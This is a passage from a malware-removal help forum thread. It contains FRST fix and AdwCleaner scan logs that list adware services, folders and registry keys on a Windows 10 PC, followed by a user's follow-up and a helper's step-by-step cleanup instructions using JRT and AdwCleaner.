HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BB82AE49-47B7-437A-B4B4-C356EA136A07} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BB82AE49-47B7-437A-B4B4-C356EA136A07} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application Updater => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D9F5FF7B-743F-443B-989E-4CE27064FAD0} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D9F5FF7B-743F-443B-989E-4CE27064FAD0} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application v209 => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EEDFB7AD-8B64-415B-B80E-1CDF8073A90E} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EEDFB7AD-8B64-415B-B80E-1CDF8073A90E} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application v209 Guard => key removed successfully
C:\Users\stipe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk => Shortcut argument removed successfully.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => Shortcut argument removed successfully.
C:\Users\Public\Desktop\Google Chrome.lnk => Shortcut argument removed successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 32768 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 23582406 B
Java, Flash, Steam htmlcache => 212869382 B
Windows/system/drivers => 23671882 B
Edge => 9216 B
Chrome => 468110406 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 15 B
systemprofile32 => 11982221 B
LocalService => 0 B
NetworkService => 8626 B
defaultuser0 => 0 B
stipe => 605441811 B

RecycleBin => 423682168 B
EmptyTemp: => 1.6 GB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 13-03-2017 22:55:48)


Result of scheduled keys to remove after reboot:

HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key could not remove, key could be protected
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key could not remove, key could be protected
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key could not remove, key could be protected

==== End of Fixlog 22:55:48 ====

AdwCleaner - 

# AdwCleaner v6.044 - Logfile created 13/03/2017 at 23:03:11
# Updated on 28/02/2017 by Malwarebytes
# Database : 2017-03-13.1 [Server]
# Operating System : Windows 10 Pro  (X64)
# Username : stipe - DESKTOP-SBND6RH
# Running from : C:\Users\stipe\Desktop\AdwCleaner (1).exe
# Mode: Scan
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****

Service Found:  iSafeKrnl
Service Found:  iSafeKrnlBoot
Service Found:  iSafeKrnlKit
Service Found:  iSafeKrnlMon
Service Found:  iSafeKrnlR3
Service Found:  iSafeNetFilter
Service Found:  iSafeService
Service Found:  FirefoxU
Service Found:  Apps_Cfg


***** [ Folders ] *****

Folder Found:  C:\Program Files (x86)\WinSnare(4.2.9)
Folder Found:  C:\Users\stipe\AppData\Roaming\Elex-tech
Folder Found:  C:\Users\stipe\AppData\Roaming\aMule
Folder Found:  C:\Users\stipe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\amuleC
Folder Found:  C:\ProgramData\NetworkPacketManitor
Folder Found:  C:\ProgramData\Microleaves
Folder Found:  C:\ProgramData\vCore
Folder Found:  C:\ProgramData\Hotfreshs
Folder Found:  C:\ProgramData\Plusdaxs
Folder Found:  C:\Program Files (x86)\Elex-tech
Folder Found:  C:\Windows\SysWoW64\config\systemprofile\AppData\Roaming\Tencent
Folder Found:  C:\Program Files (x86)\Firefox
Folder Found:  C:\Users\stipe\AppData\Roaming\Firefox
Folder Found:  C:\Users\stipe\AppData\Local\Firefox


***** [ Files ] *****

File Found:  C:\Users\stipe\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Free Youtube Downloader.lnk
File Found:  C:\Windows\SysNative\log\iSafeKrnlCall.log
File Found:  C:\Windows\SysNative\drivers\iSafeKrnlBoot.sys
File Found:  C:\Windows\SysNative\drivers\iSafeNetFilter.sys
File Found:  C:\Users\Public\Desktop\Free Youtube Downloader.lnk
File Found:  C:\Users\Public\Documents\temp.dat
File Found:  C:\Users\Public\Documents\report.dat
File Found:  C:\Users\stipe\AppData\Roaming\uninstall_temp.ico


***** [ DLL ] *****

No malicious DLLs found.


***** [ WMI ] *****

No malicious keys found.


***** [ Shortcuts ] *****

No infected shortcut found.


***** [ Scheduled Tasks ] *****

Task Found:  Event Collector Command Line Utility
Task Found:  Microsoft\Windows\Multimedia\Manager


***** [ Registry ] *****

Key Found:  HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Application Hosting
Key Found:  [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Application Hosting
Key Found:  HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WinSnare
Key Found:  [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WinSnare
Key Found:  HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine
Key Found:  HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine.1
Key Found:  [x64] HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine
Key Found:  [x64] HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine.1
Key Found:  HKLM\SOFTWARE\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Key Found:  HKLM\SOFTWARE\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Key Found:  HKLM\SOFTWARE\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Key Found:  HKLM\SOFTWARE\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Key Found:  HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Key Found:  HKU\.DEFAULT\Software\ompndb
Key Found:  HKU\.DEFAULT\Software\jhdbca
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Installer
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Reimage
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Vittalia
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\AutoTime
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\VideoBox
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\mtHotfresh
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\mtApphserftoH
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\WinSnare
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\mtPlusdax
Key Found:  HKU\S-1-5-18\Software\ompndb
Key Found:  HKU\S-1-5-18\Software\jhdbca
Key Found:  HKCU\Software\Installer
Key Found:  HKCU\Software\Reimage
Key Found:  HKCU\Software\Vittalia
Key Found:  HKCU\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Key Found:  HKCU\Software\AutoTime
Key Found:  HKCU\Software\VideoBox
Key Found:  HKCU\Software\mtHotfresh
Key Found:  HKCU\Software\mtApphserftoH
Key Found:  HKCU\Software\WinSnare
Key Found:  HKCU\Software\mtPlusdax
Key Found:  HKLM\SOFTWARE\Elex-tech
Key Found:  HKLM\SOFTWARE\ScreenShot
Key Found:  HKLM\SOFTWARE\ompndb
Key Found:  HKLM\SOFTWARE\jhdbca
Key Found:  HKLM\SOFTWARE\Microleaves
Key Found:  HKLM\SOFTWARE\mtHotfresh
Key Found:  HKLM\SOFTWARE\mtApphserftoH
Key Found:  HKLM\SOFTWARE\startpageing123Software
Key Found:  HKLM\SOFTWARE\msServer
Key Found:  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iSafe
Key Found:  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns
Key Found:  [x64] HKCU\Software\Installer
Key Found:  [x64] HKCU\Software\Reimage
Key Found:  [x64] HKCU\Software\Vittalia
Key Found:  [x64] HKCU\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Key Found:  [x64] HKCU\Software\AutoTime
Key Found:  [x64] HKCU\Software\VideoBox
Key Found:  [x64] HKCU\Software\mtHotfresh
Key Found:  [x64] HKCU\Software\mtApphserftoH
Key Found:  [x64] HKCU\Software\WinSnare
Key Found:  [x64] HKCU\Software\mtPlusdax
Key Found:  [x64] HKLM\SOFTWARE\Reimage
Key Found:  [x64] HKLM\SOFTWARE\ompndb
Key Found:  [x64] HKLM\SOFTWARE\jhdbca
Key Found:  [x64] HKLM\SOFTWARE\Microleaves
Key Found:  [x64] HKLM\SOFTWARE\InterSect Alliance
Key Found:  HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL
Value Found:  HKCU\Environment [SNF]
Value Found:  HKCU\Environment [SNP]
Key Found:  HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Application Hosting
Value Found:  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [WinSAPSvc]
Key Found:  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Hotfresh.exe
Key Found:  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\ApphserftoH.exe
Key Found:  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Hotfresh.exe
Key Found:  HKCU\SOFTWARE\Classes\ChromeHTML
Key Found:  HKCU\SOFTWARE\Clients\StartMenuInternet\ChromeHTML


***** [ Web browsers ] *****

No malicious Firefox based browser items found.
No malicious Chromium based browser items found.

*************************

C:\AdwCleaner\AdwCleaner[S0].txt - [6887 Bytes] - [13/03/2017 23:03:11]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [6960 Bytes] ##########

I have attached FRST and Addition.txt

Attached Files



#14 stipess

stipess
  • Topic Starter

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:04:16 PM

Posted 13 March 2017 - 05:22 PM

AdwCleaner found around 37 threats, but since you didn't mention clicking the "Clean" button, I didn't do it.

Also, these programs are running in task manager, and when I try to end them, it says access denied - http://prntscr.com/ejlnkk

Also, these programs still appear in Programs and Features - http://prntscr.com/ejlnud  http://prntscr.com/ejlnxk  http://prntscr.com/ejlo56  http://prntscr.com/ejlo8s

 

I won't do anything unless instructed.


Edited by stipess, 13 March 2017 - 05:23 PM.


#15 Slurppa

Slurppa

  • Malware Study Hall Senior
  • 656 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:16 PM

Posted 15 March 2017 - 12:40 PM

Hi stipess

Lets continue

:step1:

96jfrSi.png Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
:step2:

Please download AdwCleaner by Malwarebytes and save to your Desktop.
  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator
  • The tool will start to update the database if one is required.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Logfile button.
  • A window will open which lists the logs of your scans.
  • Click on the Scan tab.
  • Double-click the most recent scan which will be at the top of the list....the log will appear.
  • Review the results...see note below
  • After reviewing the log, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
  • To open a Cleaning log, launch AdwareClearer, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
  • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
  • A copy of all logfiles are saved to C:\AdwCleaner.
  • -- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.
Post Jrt log, Adwcleaner log & new FRST log in your next reply.

Member of the Bleeping Computer A.I.I. early response team!





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users